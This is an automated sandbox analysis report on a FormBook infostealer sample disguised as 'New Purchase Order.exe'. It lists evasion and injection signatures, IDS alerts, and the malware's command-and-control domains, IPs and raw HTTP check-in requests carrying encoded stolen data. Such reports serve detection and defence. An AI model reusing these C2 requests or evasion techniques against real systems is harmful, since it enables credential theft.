Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Purchase Order.exe

Overview

General Information

Sample name:New Purchase Order.exe
Analysis ID:1567394
MD5:c4a4fd2e695f61cefcf6bacd76fd91e5
SHA1:1d9d9b3ab5151310db4a828d329e28b77536e28c
SHA256:750c0b5cd8ecc25f79e725e1184401806154c3d4880cfabdc3641040a21798d6
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • New Purchase Order.exe (PID: 7668 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: C4A4FD2E695F61CEFCF6BACD76FD91E5)
    • New Purchase Order.exe (PID: 7880 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: C4A4FD2E695F61CEFCF6BACD76FD91E5)
      • snpURZzZKgO.exe (PID: 5772 cmdline: "C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 1704 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • snpURZzZKgO.exe (PID: 5828 cmdline: "C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1184 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.New Purchase Order.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.New Purchase Order.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:16:54.314122+010020507451Malware Command and Control Activity Detected192.168.2.949870161.97.142.14480TCP
                2024-12-03T14:17:20.238916+010020507451Malware Command and Control Activity Detected192.168.2.949930107.155.56.3080TCP
                2024-12-03T14:17:35.999511+010020507451Malware Command and Control Activity Detected192.168.2.94996854.179.173.6080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:16:54.314122+010028554651A Network Trojan was detected192.168.2.949870161.97.142.14480TCP
                2024-12-03T14:17:20.238916+010028554651A Network Trojan was detected192.168.2.949930107.155.56.3080TCP
                2024-12-03T14:17:35.999511+010028554651A Network Trojan was detected192.168.2.94996854.179.173.6080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:17:12.093744+010028554641A Network Trojan was detected192.168.2.949910107.155.56.3080TCP
                2024-12-03T14:17:14.770065+010028554641A Network Trojan was detected192.168.2.949917107.155.56.3080TCP
                2024-12-03T14:17:17.437644+010028554641A Network Trojan was detected192.168.2.949923107.155.56.3080TCP
                2024-12-03T14:17:27.781273+010028554641A Network Trojan was detected192.168.2.94994854.179.173.6080TCP
                2024-12-03T14:17:30.453326+010028554641A Network Trojan was detected192.168.2.94995654.179.173.6080TCP
                2024-12-03T14:17:33.191667+010028554641A Network Trojan was detected192.168.2.94996254.179.173.6080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.taxiquynhonnew.click/y49d/Avira URL Cloud: Label: malware
                Source: http://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2Avira URL Cloud: Label: malware
                Source: https://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: New Purchase Order.exeReversingLabs: Detection: 42%
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610575297.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1946849090.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2611853715.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: New Purchase Order.exeJoe Sandbox ML: detected
                Source: New Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611092147.0000000000D17000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: snpURZzZKgO.exe, 00000005.00000002.2610064445.00000000002DE000.00000002.00000001.01000000.0000000C.sdmp, snpURZzZKgO.exe, 00000009.00000002.2610993422.00000000002DE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1940041347.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1946811053.0000000002A94000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000003.1940041347.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1946811053.0000000002A94000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611092147.0000000000D17000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001DC9D0 FindFirstFileW,FindNextFileW,FindClose,8_2_001DC9D0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then xor eax, eax8_2_001C9F80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then mov ebx, 00000004h8_2_02AE04D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49870 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49870 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49917 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49923 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49910 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49930 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49930 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49956 -> 54.179.173.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49962 -> 54.179.173.60:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49968 -> 54.179.173.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49948 -> 54.179.173.60:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49968 -> 54.179.173.60:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.070001325.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 54.179.173.60 54.179.173.60
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: Joe Sandbox ViewASN Name: UHGL-AS-APUCloudHKHoldingsGroupLimitedHK UHGL-AS-APUCloudHKHoldingsGroupLimitedHK
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.070001325.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2gcl/?INvlf=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZelj0tsTwcFH17YLMDQdjUbN6i8hA==&afo=JnyH0Z2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.expancz.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.taxiquynhonnew.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.070001325.xyz
                Source: global trafficDNS traffic detected: DNS query: www.expancz.top
                Source: global trafficDNS traffic detected: DNS query: www.taxiquynhonnew.click
                Source: global trafficDNS traffic detected: DNS query: www.epitomize.shop
                Source: unknownHTTP traffic detected: POST /2gcl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.expancz.topOrigin: http://www.expancz.topConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 194Cache-Control: max-age=0Referer: http://www.expancz.top/2gcl/User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 49 4e 76 6c 66 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 54 43 31 6e 66 77 71 77 2b 36 4a 46 31 4f 30 68 73 72 53 62 6d 30 62 52 6c 36 78 44 Data Ascii: INvlf=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC1nfwqw+6JF1O0hsrSbm0bRl6xD
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:16:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: New Purchase Order.exe, 00000000.00000002.1397890145.00000000029D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: snpURZzZKgO.exe, 00000009.00000002.2611954893.0000000000854000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click
                Source: snpURZzZKgO.exe, 00000009.00000002.2611954893.0000000000854000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click/y49d/
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                Source: snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dq0ib5xlct7tw.cloudfront.net/
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://l3filejson4dvd.josyliving.com/favicon.ico
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: tzutil.exe, 00000008.00000003.2130321658.0000000007604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s.yimg.com/wi/ytc.js
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: tzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
                Source: tzutil.exe, 00000008.00000002.2616065129.0000000003978000.00000004.10000000.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002C78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
